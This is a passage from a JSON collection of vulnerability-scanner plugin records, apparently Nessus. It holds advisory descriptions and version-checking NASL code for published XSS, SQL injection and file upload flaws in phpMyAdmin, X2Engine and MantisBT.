0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:50", "description": "The phpMyAdmin development team reports :\n\nMultiple XSS vulnerabilities in browse table, ENUM editor, monitor, query charts and table relations pages.\n\nWith a crafted database, table or a primary/unique key column name it is possible to trigger an XSS when dropping a row from the table. With a crafted column name it is possible to trigger an XSS in the ENUM editor dialog. 
With a crafted variable name or a crafted value for unit field it is possible to trigger a self-XSS when adding a new chart in the monitor page. With a crafted value for x-axis label it is possible to trigger a self-XSS in the query chart page. With a crafted relation name it is possible to trigger an XSS in table relations page.\n\nXSS in view operations page.\n\nWith a crafted view name it is possible to trigger an XSS when dropping the view in view operation page.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-18T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- XSS vulnerabilities (fbb01289-2645-11e4-bc44-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_FBB01289264511E4BC446805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/77235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77235);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- XSS vulnerabilities (fbb01289-2645-11e4-bc44-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nMultiple XSS vulnerabilities in browse table, ENUM editor, monitor,\nquery charts and table relations pages.\n\nWith a crafted database, table or a primary/unique key 
column name it\nis possible to trigger an XSS when dropping a row from the table. With\na crafted column name it is possible to trigger an XSS in the ENUM\neditor dialog. With a crafted variable name or a crafted value for\nunit field it is possible to trigger a self-XSS when adding a new\nchart in the monitor page. With a crafted value for x-axis label it is\npossible to trigger a self-XSS in the query chart page. With a crafted\nrelation name it is possible to trigger an XSS in table relations\npage.\n\nXSS in view operations page.\n\nWith a crafted view name it is possible to trigger an XSS when\ndropping the view in view operation page.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-8/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-9.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-9/\"\n );\n # https://vuxml.freebsd.org/freebsd/fbb01289-2645-11e4-bc44-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d37ee31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.7.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:49:17", "description": "Versions of phpMyAdmin earlier than 4.1.14.1 or 4.2.4 are affected by multiple cross-site scripting vulnerabilities, due to insufficient user input sanitation in the following areas :\n\n - Input related to Recent/Favorite table navigation.\n - Input of crafted table names, when hiding or unhiding a table in navigation.", "cvss3": {"score": 3.7, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2014-06-30T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.1.x < 4.1.14.1, 4.2.x < 4.2.4 Multiple XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349", "CVE-2014-4348"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8316.PRM", "href": "https://www.tenable.com/plugins/nnm/8316", "sourceData": "Binary data 8316.prm", "cvss": {"score": 4.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:50:03", "description": "The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML 
output in recent/favorite tables navigation.\n\nWhen marking a crafted database or table name as favorite or having it in recent tables, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.\n\nSelf-XSS due to unescaped HTML output in navigation items hiding feature.\n\nWhen hiding or unhiding a crafted table name in the navigation, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-23T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names (c4892644-f8c6-11e3-9f45-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C4892644F8C611E39F456805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/76177", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76177);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4348\", \"CVE-2014-4349\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names (c4892644-f8c6-11e3-9f45-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in recent/favorite tables\nnavigation.\n\nWhen marking a crafted database or table name as 
favorite or having it\nin recent tables, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to\nphpMyAdmin, as the usual token protection prevents non-logged-in users\nfrom accessing the required form.\n\nSelf-XSS due to unescaped HTML output in navigation items hiding\nfeature.\n\nWhen hiding or unhiding a crafted table name in the navigation, it is\npossible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to\nphpMyAdmin, as the usual token protection prevents non-logged-in users\nfrom accessing the required form.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-2/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-3/\"\n );\n # https://vuxml.freebsd.org/freebsd/c4892644-f8c6-11e3-9f45-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7fba081\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.1.0<4.2.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:59", "description": "Multiple vulnerabilities have been discovered and corrected in phpmyadmin :\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) database name or (2) table name that is improperly handled after presence in (a) the favorite list or (b) recent tables (CVE-2014-4348).\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action (CVE-2014-4349).\n\nThis upgrade provides the latest phpmyadmin version (4.2.5) to address these vulnerabilities.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-09T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:126)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4348", 
"CVE-2014-4349"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-126.NASL", "href": "https://www.tenable.com/plugins/nessus/76423", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:126. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76423);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4348\", \"CVE-2014-4349\");\n script_bugtraq_id(68201, 68205);\n script_xref(name:\"MDVSA\", value:\"2014:126\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:126)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in\nphpmyadmin :\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin\n4.2.x before 4.2.4 allow remote authenticated users to inject\narbitrary web script or HTML via a crafted (1) database name or (2)\ntable name that is improperly handled after presence in (a) the\nfavorite list or (b) recent tables (CVE-2014-4348).\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin\n4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote\nauthenticated users to inject arbitrary web script or HTML via a\ncrafted table name that is improperly handled after a (1) hide or (2)\nunhide action (CVE-2014-4349).\n\nThis upgrade provides the latest phpmyadmin version (4.2.5) to address\nthese 
vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceforge.net/p/phpmyadmin/news/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandrake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.5-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-12T15:46:20", "description": "According to its version number, the X2Engine application installed on the remote web server is potentially affected by multiple vulnerabilities :\n\n - A PHP object injection vulnerability exists which can be used to carry out Server-Side Request Forgery (SSRF) attacks using specially crafted serialized objects. An attacker can exploit this issue by sending a crafted serialized request via the 'report' HTTP POST parameter of the 'SiteController.php' script. (CVE-2014-5297)\n\n - A file upload vulnerability exists in the script 'FileUploadsFilter.php' due to a case-sensitive file name check by the regex contained in the constant 'FileUploadsFilter::EXT_BLACKLIST'. 
An attacker, using a crafted file name with capital letters in the extension, can bypass file upload restrictions to load and execute arbitrary PHP scripts, provided the X2Engine is running under a case-insensitive file system or configuration.\n (CVE-2014-5298)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-23T00:00:00", "type": "nessus", "title": "X2Engine < 4.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5297", "CVE-2014-5298"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:x2engine:x2engine"], "id": "X2ENGINE_4_2.NASL", "href": "https://www.tenable.com/plugins/nessus/81438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81438);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-5297\", \"CVE-2014-5298\");\n script_bugtraq_id(70080, 70081);\n\n script_name(english:\"X2Engine < 4.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the X2Engine application installed on\nthe remote web server is potentially affected by multiple\nvulnerabilities :\n\n - A PHP object injection vulnerability exists which can be\n used to carry out Server-Side Request Forgery (SSRF)\n attacks using specially crafted serialized objects. An\n attacker can exploit this issue by sending a crafted\n serialized request via the 'report' HTTP POST parameter\n of the 'SiteController.php' script. 
(CVE-2014-5297)\n\n - A file upload vulnerability exists in the script\n 'FileUploadsFilter.php' due to a case-sensitive file\n name check by the regex contained in the constant\n 'FileUploadsFilter::EXT_BLACKLIST'. An attacker, using a\n crafted file name with capital letters in the extension,\n can bypass file upload restrictions to load and execute\n arbitrary PHP scripts, provided the X2Engine is running\n under a case-insensitive file system or configuration.\n (CVE-2014-5298)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/77\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/78\");\n script_set_attribute(attribute:\"see_also\", value:\"http://community.x2crm.com/index.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/X2Engine/X2CRM/blob/master/CHANGELOG.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 4.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/23\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:x2engine:x2engine\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"x2engine_detect.nbin\");\n script_require_keys(\"www/PHP\", \"installed_sw/X2Engine\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"X2Engine\";\nfix = \"4.2\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\ninstall_url = build_url(port:port, qs:dir + \"/login\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] < 4) ||\n (ver[0] == 4 && ver[1] < 2)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : ' +fix+\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:02:43", "description": "According to its version number, the MantisBT install hosted on the remote web server is 1.1.0 or later but prior to 1.2.16. It is, therefore, affected by multiple vulnerabilities:\n\n - A cross-site scripting flaw exists with the 'account_sponsor_page.php' where the 'project_id' parameter is not validated upon submission. 
This could allow a remote attacker to execute arbitrary script code within the browser / server trust relationship with a specially crafted request. (CVE-2013-4460)\n\n - A SQL injection flaw exists in the SOAP API with the 'db_query()' function where user-supplied input is not properly sanitized via the 'mc_issue_attachment_get' SOAP request. This could allow a remote attacker to inject or manipulate SQL queries, allowing for the manipulation or disclosure of arbitrary data. This issue affects version 1.1.0a4 or later. (CVE-2014-1608)\n\n - SQL injection flaws exist in 'core/news_api.php', 'core/summary_api.php', 'plugins/MantisGraph/core/graph_api.php', 'api/soap/mc_project_api.php', and 'proj_doc_page.php' pages. This could allow a remote attacker to inject or manipulate SQL queries, allowing for the manipulation or disclosure of arbitrary data. This issue only affects versions 1.2.0 - 1.2.15. (CVE-2014-1609)\n\nNote that Nessus has relied only on the self-reported version number and has not actually tried to exploit these issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-27T00:00:00", "type": "nessus", "title": "MantisBT 1.1.0 < 1.2.16 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4460", "CVE-2014-1608", "CVE-2014-1609"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mantisbt:mantisbt"], "id": "MANTIS_1_2_16.NASL", "href": "https://www.tenable.com/plugins/nessus/73226", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73226);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4460\", \"CVE-2014-1608\", \"CVE-2014-1609\");\n script_bugtraq_id(63273, 65445, 65461);\n\n script_name(english:\"MantisBT 1.1.0 < 1.2.16 Multiple Vulnerabilities\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the MantisBT install hosted on the\nremote web server is 1.1.0 or later but prior to 1.2.16. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - A cross-site scripting flaw exists with the\n 'account_sponsor_page.php' where the 'project_id'\n parameter is not validated upon submission. This could\n allow a remote attacker to execute arbitrary script\n code within the browser / server trust relationship\n with a specially crafted request. (CVE-2013-4460)\n\n - A SQL injection flaw exists in the SOAP API with the\n 'db_query()' function where user-supplied input is not\n properly sanitized via the 'mc_issue_attachment_get'\n SOAP request. This could allow a remote attacker to\n inject or manipulate SQL queries, allowing for the\n manipulation or disclosure of arbitrary data. This issue\n affects version 1.1.0a4 or later. (CVE-2014-1608)\n\n - SQL injection flaws exist in\n 'core/news_api.php', 'core/summary_api.php',\n 'plugins/MantisGraph/core/graph_api.php',\n 'api/soap/mc_project_api.php', and 'proj_doc_page.php'\n pages. This could allow a remote attacker to inject or\n manipulate SQL queries, allowing for the manipulation or\n disclosure of arbitrary data. This issue only affects\n versions 1.2.0 - 1.2.15. 
